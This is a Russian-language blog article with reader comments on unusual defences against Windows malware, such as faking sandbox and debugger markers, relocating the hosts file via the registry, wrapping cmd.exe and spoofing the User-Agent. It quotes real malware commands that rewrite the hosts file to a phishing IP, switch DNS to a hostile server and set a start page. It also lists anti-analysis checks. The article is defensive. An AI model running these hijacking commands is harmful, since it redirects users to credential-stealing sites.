Неочевидные способы защиты от malware

    В спорах и обсуждениях того, как защитить свой компьютер от зловредов сломано немало копий и на эту тему можно найти множество книг и статей, причем бОльшая часть из них просто дублируют друг друга, рассказывая одно и тоже разными словами. Тому, кто интересуется информационной безопасностью крайне сложно в таких обсуждениях и статьях встретить о защите что-то новое, чего раньше он не знал или просто не задумывался над этим… но, насколько это ни самонадеянно звучит, я все-таки постараюсь пробудить у вас хоть капельку интереса к этой избитой теме и расскажу именно о неочевидных способах защиты, опустив старческое брюзжание о том, что нужно вовремя обновлять плагины к браузерам, не переходить по левым ссылкам и т.д

    В этой небольшой заметке о некоторых интересных особенностях функционирования зловредов я призываю вас отказаться от антивируса и от других способов самозащиты — обновлений, настройки программ и внимательности при переходе по ссылкам и запуске приложений… к слову «призываю» добавляем частицу «НЕ» и все будет на своих местах.



    Данную статью стоит рассматривать лишь как необычный обзор общих действий в поведении малвари, против которой мы можем создать защиту, которую стоит рассматривать больше как «о, прикольно, зловред не работает!» и как некую найденную изюминку в вирусных исследованиях.

    Начать стоит с того, что самой не очевидной защитой является использование учетной записи пользователя, а не администратора, но т.к на такую жертву способны лишь единицы, а большинство с админскими правами, то и возвращаться к этой неприятной теме больше не будем, но иметь это ввиду все же стоит, вдруг когда-нибудь, да пригодится.

    [оффтоп] у меня прям язык чешется прокричать, что плагин java нужно отключать, а включать его только при необходимости, что просмотр pdf в браузере особо не нужен, потому файлы лучше сохранять на хард, а потом смотреть их через какой-то левый, никому не интересный pdf-просмотрщик, что на ХР автозапуск с флешек можно отключить, внеся пару строк в реестра, что ..., но все эти полуочевидные методы защиты известны из без меня, потому прошу всех меня простить: тех, кто ожидал полного разбора защиты ПК за то, что его не будет, а тех кто ожидал только нового — за то, что вспомнил про эту классику. [/оффтоп]

    Я тучка, тучка, тучка, а вовсе не медведь

    Достаточно многие малвари (хотя скорее их создатели) догадываются о существовании антивирусов, вирусных аналитиков, автоматических систем анализа и о прочей инфраструктуре «корпорации добра» и всячески стараются усложнить им жизнь и продлить жизнь своим поделкам, путем различных технических приемов по усложнению анализа зловреда и наложения на него детекта. Простейшим примером этого может служить криптовка/паковка, которая убивает сразу небольшой табун зайцев:
    — если зловред задетектился, то перепаковал его и снова в шоколаде
    — дизассемблеры/статические анализатор становятся бесполезными (нужен ручной разбор с отладчиком)
    — не каждый эмулятор антивируса раскрутит даже простенький криптор
    Пример самый, что ни на есть банальный, призванный показать в какую сторону мыслят хакеры (по правильному их нужно называть преступниками, но такая уж откуда-то традиция пошла подменять понятия...). А мысль следующая (от лица малвари): если я чувствую, что меня исследуют, то зловредствовать не буду, дабы не поняли как я работаю или вообще не поняли мою злую сущность. Свою «подопытность» она определяет так:

    1. Обнаружение запуска под онлайн сервисами анализа поведения (Anubis, ThreatExpert, ...)
    Производится путем проверки имени компьютера, пользователя, нахождения в адресном пространстве определенных dll-библиотек, ключу
    операционной системы.
    2. Обнаружение виртуальной машины (VMWare, SandBox)
    Путем поиска определенных процессов, ключей реестра, железа, выявление различий с обычной системой разными ассемблерными трюками.
    3. Детект отладчика
    Проверка определенных байтов в окружении, поиск окна, процесса, драйвера.
    4. Обнаружение утилит активного/пассивного мониторинга (RegMon, FileMon, RegShot)
    Обычно это реализовано поиском окна по заголовку.

    Суть данной антивирусной защиты до безобразия простая — дать малвари понять, что ее исследуют и она сама откажется от своих дурных намерений. Переходя от теории к практике (в разумных пределах) сказать можно следующее (по аналогичным пунктам):
    1. Имя юзера и компьютера — sandbox.
    2. Процесс в системе: vmware.exe, VMwareTray.exe. Раздел HKLM\SYSTEM\ControlSet001\Services\vmware. Файл vmnet.sys в drivers.
    3. Многие детектят драйвер SoftIce — достаточно его запустить, он кинет драйвер и все (да-да, его до сих пор ищут!). Окно с классом «OllyDBG».
    4. Окна с заголовком «File Monitor — Sysinternals: www.sysinternals.com», «Registry Monitor — Sysinternals: www.sysinternals.com».
    По сути все это просто сделать (если захотеть): при установке системы задать определенные имена, создать пару ключей/файлов, написать тулзу, которая будет держать невидимыми несколько окон с определенными именами, а саму тулзу назвать vmware.exe.

    ВКонтакте отключен за неоплату хостинга

    Вот вам смешно, а нечто подобное на своих экранах могут наблюдать многие наши соотечественники. Огромную популярность имеют троянцы класса Qhost, задача которых тупо отредактировать файл hosts и самоудалиться, таким образом, адресам сайтов популярных социальных сетей (вконтакте, одноклассники) присваивается левый IP-адрес… и человек потеряет свой логин/пароль, да еще и смс отправит…
    Несмотря на технологическую простоту создания, данные троянцы приносят большой профит создателям — минимум усилий и в краткосрочном периоде куча вконтакте акков и денег. hosts-файл редактируется или напрямую (открытие->запись) или посредством командных интерпретаторов (создание и запуск bat/vbs) — все очень просто: по некоему фиксированному пути (C:\WINDOWS\system32\drivers\etc\hosts) лежит файл в конец которого нужно дописать несколько строк — это же второй урок программирования на любом языке после hello world'a! А вот тут-то и есть небольшая хитрость защиты, дело в том, что путь к папке etc указан в реестре и если поменять путь на другую папку (туда положить все файлы из предыдущей, а из etc потереть), то троянец будет несколько удивлен…

    Вот этот ключик:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\\DataBasePath
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\\DataBasePath (и по другим 00Х ключам соответственно).

    Об уровне интеллекта и национальности авторов некоторых троянцев такого класса можно выдвинуть предположение даже без заглядывания в код:

    image

    Батники имеют примерно (упрощенно — убрана обфускация, оставлена лишь переменная TANGLE для наглядного понимания как обфусируются bat-файлы ) следующее содержание:

    SET TEATEATEA=%windir%\System32\drivers\etc\hosts
    SET TANGLE=.co
    echo 66.55.140.181 my.mail.ru >> %TEATEATEA%
    echo 66.55.140.181 m.my.mail.ru >> %TEATEATEA%
    echo 66.55.140.181 vk%TANGLE%m >> %TEATEATEA%


    Консоль видишь? Нет? А она есть…

    При эксплуатации уязвимости шелл-код очень часто выполняет разные действия, манипулируя cmd.exe, благо запустить его просто (система даже путь сама к нему найдет) и букв в нем мало и в системе он есть, а это для шеллкода очень важно, особенно в свете последних технологий перемены адресов всего что только можно в адресном пространстве.
    Потому наша главная задача это подложить хакерам и тут эдакую толстую, подозрительно хрюкающую свинью: можно подменить системный cmd.exe (включая его копии в dllcache, i386, $NtServicePackUninstall$) нашей заглушкой, которая при вызове будет сохранять в буфер переданные параметры и выдавать алерт «продолжать, али нет» и при согласии на то будет с теми же параметрами запускать уже нормальный cmd (предварительно положенный рядом в переименованном виде).
    Современная малварь очень многие критичные действия в системе делает посредством запуска cmd.exe с километровой длинны параметрами (например внесение изменений в тот же hosts).

    Заглушку можно усложнить добавив ей возможность считывать из конфига на какие процессы не выдавать алерт о запуске, а сразу передавать параметры к новому cmd.
    Данная мысль стала оформляться, расти и крепнуть при наблюдении постоянного сближения зловредов и cmd.exe — они прям стали лучшими друзьями и даже больше — он для них является прям Тарасом Бульбой: сам порождает, сам и убивает — при срабатывании эксплоита именно он зачастую запускает загруженную малварь и метод самоудаления тоже реализован через bat-файл, да и во время своей работы вредонос время от времени нагружает командный интерпретатор работой.
    Отдельно хочется отметить существование бестелесных звлоредов, у которых и худенького exe-файла в системе нет, а все выполняет java — эксплоит ей указывает, что нужно делать и она послушно исполняет. Вот пример из жизни (данные действия производит процесс java.exe):

    cmd.exe /C «ChCp 1251 & netsh interface ip set dns name=»Local Area Connection" source=static addr=5.199.140.178"
    reg add «hkcu\Software\Microsoft\Internet Explorer\Main» /v «Start Page» /t REG_SZ /f /d «шттп://dubsearch.ru»


    Для самого себя в исследовательских целях была написана такая утилита, если нужен исходный код или сама тулза, то можно со мной связаться и без проблем его дам, мне не жалко.
    В данном пункте стоит отметить еще одну немаловажную деталь, накладывающую жесткие ограничения на использование данного способа защиты на реальной системе: если вы лицензионный пользователь антивируса «Иммунитет», то от нашего левого cmd.exe будет очень много запросов на запуск батников.

    Линуксы направо, виндусы налево

    Известно, что большинство зловредов приходят к нам на компьютер через окно в интернет — через браузер и его плагины, потому поставив защиту на этом этапе (Файл — Работать автономно… шутка) мы отсечем львиную долю угроз. Для этого вкратце рассмотрим принцип работы эксплоит-пака:
    1. Из User Agent'a извлекается информация о браузере и его версии, операционной системе и языке
    2. В зависимости от результатов первого пункта (см.ниже) происходит определение какие плагины вообще есть и эксплуатация их уязвимости, либо, если ничего подходящего среди имеющихся эксплоитов нет, не происходит ничего плохого

    Разумеется, что есть и исключения, когда независимо ни от чего в код страницы засовываются сразу все эксплоиты (авось хоть что-то сработает), но большинство эксплоит-паков ведут статистику, учет по странам, имеют красивый интерфейс и прочие плюшки и настройки. Посему философия защиты такова: нужно изменить User Agent и указать там то, против чего точно нет в запасе эксплоитов, например Линукс. В идеале, конечно, было бы вообще заменить UserAgent на линуксовский браузер какой-нибудь полностью, но это в теории может повлечь небольшие перекосы страниц на каких-нибудь сайтах, хотя я такого не замечал.
    Все популярные связки (та же Blackhole exploit kit) моментом отправят вас общаться с гуглом, даже без попытки опробовать на вашем браузере эксплоит.

    Вместо вывода

    Статью ни в коей мере не стоит воспринимать как призыв отказываться от антивируса и других разумных средств защиты о которых вы все знаете. Просто теперь в дополнение к ним можно либо использовать озвученные мною методы, либо не использовать, а просто знать о существовании таких препятствий на жизненном пути зловреда.
    Share post
    AdBlock has stolen the banner, but banners are not teeth — they will be back

    More
    Ads

    Comments 44

      0
      Менять DataBasePath это интересно, особенно если задать новый путь к файлу а не папке.
      А то вдруг малвари научатся читать из реестра путь.
        +18
        После этой статьи, — научатся.
        0
        А что помешает малваре считать путь к файлу, а не к папке? Здесь вообще подход строится на том, что малвари достаточно тупы (т.к. пишутся пачками, на коленки и побыстрее) и не ведут себя, православно беря пути из реестра.
          0
          В этой ветке реестра прописан только путь к папке.
          Я имел ввиду записать туда путь к файлу.
          Тогда малварь должна подставить в конец пути \hosts которого не найдет.
            0
            Кстати, да. А еще, скорее всего выпасть с ексепшеном и соответствующим диалоговым окном от системы. А это еще один флажок «Шеф, у нас проблемы», помню так детектилась вирусня, которая пыталась себя записать на букву диска, соответствующую cd-bay, например.
              0
              А у системы от таких выкрутасов крыша не поедет?
                0
                Удаление файла hosts и замена его на папку не вредило, значит и путь в реестре не особо изменит ситуацию.
          +6
          Win7 does not support the DatabasePath anymore, and the existence of DatabasePath is either a left-over or backward-compatibility for apps and programs

          social.technet.microsoft.com/Forums/en-US/w7itpronetworking/thread/ac9710ff-ed68-40c5-b95a-bc8a84600a9d
            +2
            Ну файлу hosts можно обрезать файловые примиссии, оставив только чтение. На работоспособности системы не сказывается, зато от мелких пакостников неплохо защищает.
              0
              Денвер и подобные пролетают.
                +3
                И слава богу.
              0
              В последнее время часто вижу троянов, использующих планировщик задач винды для самосборки/самокопированию/самозакачиванию из инета.
              Как с этим предложишь бороться? :)
                +2
                1. Уважающие себя АВ-комплексы выдадут алерт при попытке самозашидулиться
                2. Можно отключить шедулер
                3. Очень многие малвари прописывают таски через тот же… cmd.exe:

                «C:\WINDOWS\system32\cmd.exe» /c copy C:\WINDOWS\system32\drivers\etc\hosts C:\WINDOWS\system32\drivers\etc\hosts.sam /Y && at 15:49:00 /every:M,T,W,Th,F,S,Su cmd.exe "/c attrib -H C:\WINDOWS\system32\drivers\etc\hosts && copy C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\14727500aq C:\WINDOWS\system32\drivers\etc\hosts /Y && attrib +H C:\WINDOWS\system32\drivers\etc\hosts"

                В данном примере из жизни реальной малвари видим и прямой путь до hosts, и использование cmd :)
                  0
                  Ну базовый антивирус windows security essential не умеет вообще каким-либо образом видеть гадость в шедулере.
                +12
                Я думаю, что те пользователи, которые ловят вирусы — скорее всего не читают хабр и вообще хоть что-нибудь. Так что у них скорее всего будет в настройках «не отображать расширения для известных типов файлов».

                Еще у них 6-8 надстроек браузера (интернет експлорера), в авто-запуске минимум 30 наименований файлов неизвестного происхождения и все в таком-же духе. Пишу очевидные вещи, не смог себя перебороть :)
                  +3
                  Как же я вас понимаю, от mail спутника офигеваю
                  0
                  Эх, вот бы софтинку, которая бы сэмулировала всю эту песочницу в один клик…
                    +9
                    Под видом этой софтинки как раз вирусню и подсунут.
                    +1
                    >Начать стоит с того, что самой не очевидной защитой является использование учетной записи пользователя, а не администратора
                    привет вам от User Account Control и команд sudo и su
                    это как раз самая очевидная защита, так как она почти у всех включена по умолчению, и о ней все знают

                    >что на ХР автозапуск с флешек можно отключить
                    да и не только на икспи

                    а вот один из неочевидных спрособов — сделать железный файрвол для флешки с режимами «только чтение», «запретить создание типичных вирусных папок и файлов, а также запретить назначение атрибутов, а также запретить писать загрузочную запись»
                    давно руки чешутся такой сделать, да всё влом копать спецификацию юсб

                    >Производится путем проверки имени компьютера, пользователя, нахождения в адресном пространстве определенных dll-библиотек, ключу операционной системы.
                    откуда у Вас такая осведомлённость о том, как устроен анубис и прочие онлайн-песочницы
                    может там какая-нибудь хитроумная песочница, которая всё это подменяет
                    может там вообще используется полнеценная виртуальная машина, имитирующая обычную винду с кучей прог, которые у обычного юзера понаустановлены?
                    требую пруф

                    >2. Обнаружение виртуальной машины (VMWare, SandBox)
                    >Путем поиска определенных процессов, ключей реестра, железа, выявление различий с обычной системой разными ассемблерными трюками.
                    Например, попыткой исполнения VMENTER

                    >дать малвари понять, что ее исследуют и она сама откажется от своих дурных намерений.
                    многие не откажутся, если цель вирмейкера — заразить как можно больше машин и тырить данные/использовать как ботнет
                    пусть детектит, если малваь укоренится как следует в системе и авер её не сможет вычистить

                    >А вот тут-то и есть небольшая хитрость защиты, дело в том, что путь к папке etc указан в реестре и если поменять путь на другую папку (туда положить все файлы из предыдущей, а из etc потереть), то троянец будет несколько удивлен…

                    а вы уверены, что горе-поделки будут за путём лазать в реестр? они скорее запишут по захардкоденому пути, взяв только переменные окружения
                    ваш совет приведёт к тому, что некоторые немалварьные проги не смогут нормально работать
                    к тому-же, для редактирования хостс нужны права админа, а их надо ещё запросить, что повлечёт срабатывание UAC

                    >можно подменить системный cmd.exe
                    вы явно троллите
                    нельзя ничего системного подменять — могут порушиться нормальные программы
                    и с чего вы взяли, что шеллкоды используют cmd?
                    почему не вызов system, почему не powershell, почему не windows Script Host, почему не пожатую и кастрированную lua?

                    >при срабатывании эксплоита именно он зачастую запускает загруженную малварь и метод самоудаления тоже реализован через bat-файл, да и во время своей работы вредонос время от времени нагружает командный интерпретатор работой.
                    дело Бабушкина живёт и процветает ;)

                    >против чего точно нет в запасе эксплоитов, например Линукс.
                    прописать в юзерагенте линукс — идея неплохая, но с чего вы взяли, что линукс никому не нужен, а уязвимости в файрфоксе или хроме специфичны для винды.макоси?
                    как база для ботнета любая ось годится

                    и почему вы не упомянули ВИРТУАЛИЗАЦИЮ
                    в частности, скажу вам, в Sandboxie абсолютное большинство программ отлично работает
                      +1
                      KOLANICH, спасибо за вопросы… приятно когда кто-то еще интересуется тем же чем и ты, потому постараюсь на все ответить :)

                      Цитировать не буду, чтобы не генерировать много букв, а просто пойду по порядку объяснять:
                      — большинство людей сидят под админом и с выключенным uac, а даже если он и включен, то можно обойти (встречаются даже такие смешные способы когда малварь в цикле до бесконечности пытается сделать некое действие пока ей не разрешат или не прибьют ее процесс:) )
                      — на ХР автозапуск с флешек можно вырубить, на более новых осях он итак отключен (благодаря kido, кстати)
                      — о том как устроен анубис можно догадаться при ковырянии малвари — если она проверят такие имена\библиотеки, то наверняка знает что делает… но это несерьезно:) А если говорить про достоверный способ, то узнать все об анубисе и подобных легко так: делается билд пинча, заливается туда на анализ, затем читаем отчет, который троян прислал — там будет вся инфа о системе.
                      — разумеется, что бОльшая часть малвари не использует никаких средств против исследования и будет пытаться работать даже на калькуляторе
                      — с чего я взял как работают шеллкоды? мои два основных занятия это поедание пельменей и ковыряние малвари :)
                      — суть защиты от редактирования хостса в том и есть — малварь в реестр не полезет, а запишет по фиксированному пути (т.е попытается), а толку будет с этого мало
                      — я не троллю. Ничего системного подменять не советую. В нескольких местах написал как стоит относится к моей статье, хотите если подменять на реальной машине, то вы должны быть уверены в своих навыках.
                      — с чего я взял, что линукс никому не нужен? эксплоит-паки регулярно ковыряю по мере того, как вирмейкеры начинают продавать новую версию своих поделок и как-то еще не встречал чтобы эксплоит-пак пытался ехе-шник на линукс загрузить.
                      — про базу для ботнетов согласен, но вот только заражение машин на линуксе происходит иначе, например так: на сервер через уязвимый сайт заливается шелл, затем хакается сервер и становится частью ботнета (канал широченный, скорость огромная...).
                      — Sandboxie не упомянул (не упомянул ни одной защитной программы) потому что это очевидно — программа предназначена для защиты — пошел на официальный сайт, скачал, установил, пользуюсь… — чего тут неочевидного? вот потому и не упомянул.
                        0
                        Позвольте поспорить с первыми двумя пунктами:
                        — UAC отключают эникейщики и прочие недалёкие юзеры, которым мешает лишнее выскакивающее окно во время установок софта или запуска его с повышенными привилегиями. По умолчанию он включён.
                        — Автозапуск на Windows XP+ включён по умолчанию, просто его удобнее и быстрее выключать, чем на XP.
                      –2
                      Спасибо. Интересные трюки. Вряд ли буду использовать на практике, но вектор безопасности задан хороший, в каких-то ситуациях может и пригодится сделать по аналогии

                      PS: вспомнился пресловутый Бабушкин. Бедняга, даже ничего подобного не смог изобрести…
                      • UFO just landed and posted this here
                          –2
                          А как же антивирус Попова?
                          0
                          Я бы еще рекомендовал использовать EMET, последнию 3.5 Tech Preview версию — в ней помимо DEP/NullPage pre-allocation/разных ASLR/HeapSpray pre-allocation/SEHOP/EAF еще и реализовали целый ряд достаточно эффективных механизмов предотвращения использования ROP эксплуатационных техник так, что 99.99% малвари тупо не сможет передать управление на свой пейлоад и мах чего будет грозить юзеру — крэш приложения.

                          Вот на почитать — kb.atraining.ru/new-emet-3-5/.
                            0
                            Я у себя сделал так: создал отдельного бесправного пользователя (назовём его BrowserSandbox) и запускаю браузеры через простенький bat-файл командой runas /profile /savecred /user:BrowserSandbox C:\Soft\Opera\opera.exe
                            Правда, это не решает проблемы с открытием ссылок из приложений, но и тут я уже придумал, как сделать.

                            Для тех, кто захочет воспользоваться этим методом с браузером Firefox:
                            Ещё одна проблема, с которой я столкнулся — при попытке использования Мозиллы таким образом на Windows 7 при включенном флэш-плагине она имеет свойство подвисать секунд на 40-60 на страницах, где есть флэш. При более ранних версиях Adobe Flash это происходило ТОЛЬКО при выполнении следующих условий: Win 7, одноядерный процессор, флэш-плагин, страница с флэшем, ограниченная учётка мозиллы. Сейчас подвисает и на многоядерном тоже.
                              0
                              а зачем так сложно и еще мириться с лагами и подвисаниями? может лучше NoScript в браузер и отключить все плагины? (включать, например флэш, когда хотите фильм в онлайне посмотреть)
                                +1
                                Тут я полностью уверен, что, даже если выйдет какой-то 0-day для самого браузера, а не для плагинов, дальше этой ограниченной учётки малварь никуда не пролезет. И к тому же мне так удобнее, чем с виртуалкой. Опера, повторюсь, работает как надо. Мозилла — почему-то нет. Не знаю, стоит ли на такую странную конфигурацию открывать баг в треккере :) И, если открывать, то в треккере какого продукта?

                                И потом, я уже пробовал браузинг с NoScript. Не знаю, как у остальных, но у меня возникало ощущение снижения отзывчивости. Зашёл на сайт, половины содержимого нет, треть перекошена, начинаешь смотреть, с каких поддоменов разрешать скрипты и т.д.
                                  0
                                  Согласен. Тут уже кто как привык…
                                    0
                                    Firefox+NoScript+WOT+Adblock (3 штуки) + другие + стоит «Антивирус К»
                                    нетбук на атом 230 с подключенным монитором fullhd. Памяти 2Гб 1 модулем. Диск наверно 5400об/мин.

                                    тормозов нет при открытии +40 вкладок! Некоторые плагины съедают память когда общее количество 2Гб на это забиваешь.
                                    (а вот Флеша тормоза, флеш часто без яваскриптов не запускается, так что имхо от него больше пользы)

                                    Практика показала, что noScript домашнии пользователи осиливают в 50% случаев. На остальных нужно тратить больше сил :)

                                    Кстати в crome плагин NoScript мне это больше понравился (реализация интерфейса)
                                      0
                                      Снижение отзывчивости не в результате торможения! А в результате неслабого увеличения количества телодвижений, необходимых для отображения одной страницы.
                                        0
                                        95% пользователей обычно ежедневно посещают 95% уже старых сайтов и 5% новых.
                                        Для старых сайтов правило сохраняются. Для новых обычно нужно разрешить 1 в редких случаев 2 скрипта от самого сайта.
                                        Остальные же скрипты в 95% случаев носят рекламно-спамерный характер.

                                        Возможно вы те 5% которому нужна реклама и спам :)
                                        Закрывать новые окна, подпрыгивать со стула от рекламного ролика прикрепленного к краю страницы вам наверно нравится больше.

                                        К примеру есть опция разрешать скрипты для страниц в избранном. Так что если сайт стоит того чтобы быть занесен в избранное то нажать на звездочку это не сложно. ctrl+D Enter
                                          0
                                          Если говорить не про исследования малвари, а про меня, то из перечисленного вами использую обычный адблок+носкрипт+лиса+отключенные плагины (на личном ноутбуке).
                                          Но в реальности я почти всегда занят какими-то ковыряниями и сижу в виртуалке, соответственно инет-серфинг тоже с нее, а там никакой защиты нет — если какая дрянь полезет, то я ей только рад буду :)
                              • UFO just landed and posted this here
                                  +3
                                  1. Будьте вежливы. Хабр не место для дилетантствующих хамов.

                                  2. Каждый сам решает что ему дороже: удобство или безопасность. Есть компромиссы между этими крайностями, например: «я знаю, что без антивируса компьютер работает намного быстрее и меньше лагает, но все равно его использую, т.к считаю это необходимым компромиссом между производительностью и безопасностью»

                                  3. Никому менять юзерагент я не советовал, просто написал, что произведя такое действие бОльшая часть вредоносных айфреймов на связки эксплоитов будет открывать тупо гугл, а не листинги кода, целью которого будет свалить в крэш какой-нибудь плагин

                                  4.… но если серьезно взяться рассуждать к каким неудобствам приведет смена юзерагента, то:
                                  4.1 При ручном скачивании обновления (например флэш плеера) придется вручную указать, что у нас windows
                                  4.2 Статистика посещений сайтов начнет на сколько-то процентов подвирать (смотря сколько людей изменят)
                                  4.3 Какие-то сайты (найдете — напишите, мне такие не встречались) немного перекосятся

                                  5. Что касательно защиты от малвари: даже если половина exploit-pack'ов не будет работать, то это уже серьезно.
                                    0
                                    4.3 Gmail
                                      0
                                      Спорить не буду. Может смотря на какой юзерагент менять. У меня все нормально отображается.
                                  0
                                  А что мешает перенести папку «USERS», «PROGRAME DATA»на диск D:\
                                  и для диска D: отключить в политиках запуск приложений в исключения можно добавить lnk (по умолчанию ярлыки также не будут запускаться)

                                  Про то что во многих сборках отключают UAC и сидят под админом упоминать не стоит.
                                  А про путь к файлу hosts идея. Интересно другое знают ли про это антивирусы.

                                  браузер и pdf просмотрщик графики и плеер медиа можнонужно запускать в песочнице.

                                  Вместо того чтобы косить «под витруалку» можно сидеть в виртуалке. Для многих это реально.
                                  Так-же есть решения машин-времени они тоже многим подойдут shadow defender как пример. Проверено на неопытных пользователях.

                                  К данному решению стоит вписать и другие гипервизоры тот же hyper-v.

                                  Еще можно запускать приложения по списку хешей придется ручками добавлять новые.

                                  Я считаю что сидеть под пользователем и отключение запуска приложений с диска d (где профиль и запуск большинства программ в месочнице)
                                  будет гораздо полезнее решения автора.
                                    0
                                    А я и не предлагал отказаться от других средств защиты :)
                                    Просто когда много долбишь малварь, скапливается много чего интересного, чем хочется поделиться с другими чтобы другим тоже было интересно :)
                                      0
                                      А что еще осталось за кадром?
                                      можно приложения запустить от имени другого пользователя чтобы не было видно. Если это не жрет ресурсы то почему бы и нет.
                                        0
                                        Самое интересное за кадром остается, так как нельзя говорить о том, что хакеры смогут начать во вред использовать.
                                        Например, если я знаю какие-то способы безпалевного инжекта в процесс, то я об этом молчу (сообщаю об этом только нужным людям в АВ-компаниях), а не начинаю трубить направо и налево об этом… Можете считать это камнем в сторону огорода товарища М.
                                    0
                                    спасибо, познавательно, в последний раз когда нахватал зловредов, сделал немного кардинальней — просто ушел на linux sabayon, в соседнем мониторе винда из вирталбокс на весь экран в силу необходимости виндософта.
                                      0
                                      … всё вот это или просто www.ubuntu.com/start-download?distro=desktop&bits=32&release=latest

                                      Only users with full accounts can post comments. Log in, please.